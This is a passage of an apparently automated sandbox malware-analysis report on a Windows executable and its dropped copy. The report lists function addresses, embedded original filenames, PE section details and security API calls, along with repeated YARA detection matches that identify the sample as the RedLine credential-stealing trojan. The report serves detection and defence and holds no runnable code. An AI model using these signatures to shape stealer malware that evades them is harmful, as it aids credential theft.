Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_00811DA0	0_2_00811DA0
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_00819D28	0_2_00819D28
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008186A9	0_2_008186A9
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008158A9	0_2_008158A9
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008158B8	0_2_008158B8
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008108D1	0_2_008108D1
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_00818960	0_2_00818960
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_00818970	0_2_00818970
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_00815AF0	0_2_00815AF0
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_00815D80	0_2_00815D80
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008146A9	0_2_008146A9
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008146B8	0_2_008146B8
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_008117D0	0_2_008117D0
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_00815F50	0_2_00815F50
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_048FA41A	0_2_048FA41A
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_048FA428	0_2_048FA428
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_048F847C	0_2_048F847C
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09C32030	0_2_09C32030
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09C32020	0_2_09C32020
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09F4C480	0_2_09F4C480
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09F44BE8	0_2_09F44BE8
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09F44374	0_2_09F44374
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09F462C0	0_2_09F462C0
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09F447B0	0_2_09F447B0
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 0_2_09F45E88	0_2_09F45E88
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 8_2_02BEE7B0	8_2_02BEE7B0
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 8_2_02BEDC90	8_2_02BEDC90
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 8_2_06714468	8_2_06714468
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 8_2_06719628	8_2_06719628
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 8_2_06711210	8_2_06711210
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 8_2_06713320	8_2_06713320
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 8_2_0671D108	8_2_0671D108
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Code function: 8_2_0671DD00	8_2_0671DD00
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB2820	10_2_00FB2820
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB14D0	10_2_00FB14D0
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB1D99	10_2_00FB1D99
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB9D28	10_2_00FB9D28
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB86A9	10_2_00FB86A9
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB08D1	10_2_00FB08D1
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB58B8	10_2_00FB58B8
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB58A9	10_2_00FB58A9
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB8970	10_2_00FB8970
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB8960	10_2_00FB8960
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB5AF0	10_2_00FB5AF0
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB5D80	10_2_00FB5D80
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB46B8	10_2_00FB46B8
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB46A9	10_2_00FB46A9
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB17D0	10_2_00FB17D0
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_00FB5F50	10_2_00FB5F50
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_09D22030	10_2_09D22030
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_09D22020	10_2_09D22020
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_0A04BAB0	10_2_0A04BAB0
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_0A041807	10_2_0A041807
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_0A046290	10_2_0A046290
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_0A044BB8	10_2_0A044BB8
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_0A0466C8	10_2_0A0466C8
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 10_2_0A044FF0	10_2_0A044FF0
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_014AE7B0	14_2_014AE7B0
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_014ADC90	14_2_014ADC90
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_06A99628	14_2_06A99628
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_06A94468	14_2_06A94468
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_06A91210	14_2_06A91210
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_06A93311	14_2_06A93311
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_06A9DD00	14_2_06A9DD00
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_06A9CD11	14_2_06A9CD11
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Code function: 14_2_06A9D108	14_2_06A9D108

Source: nzLoHpgAln.exe, 00000000.00000002.1751633310.0000000002814000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000002.1751633310.000000000240E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000002.1764633951.00000000095DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVGHA.exe, vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000000.1656400006.0000000000042000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVGHA.exe, vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000002.1764256150.00000000093C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000002.1764433116.0000000009574000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000002.1765355652.0000000009EC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000000.00000002.1750655160.000000000084E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002DC2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefirefox.exe0 vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXED vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\080904B0\\OriginalFilename vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsedge.exe> vs nzLoHpgAln.exe
Source: nzLoHpgAln.exe	Binary or memory string: OriginalFilenameVGHA.exe, vs nzLoHpgAln.exe

Source: nzLoHpgAln.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: nzLoHpgAln.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wZWwzQVEakJvEU.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, lF62eOBaEgEorXmRSl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, lF62eOBaEgEorXmRSl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.SetAccessControl
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.AddAccessRule
Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, lF62eOBaEgEorXmRSl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.SetAccessControl
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.AddAccessRule
Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, lF62eOBaEgEorXmRSl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.SetAccessControl
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.cs	Security API names: _0020.AddAccessRule
Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, lF62eOBaEgEorXmRSl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
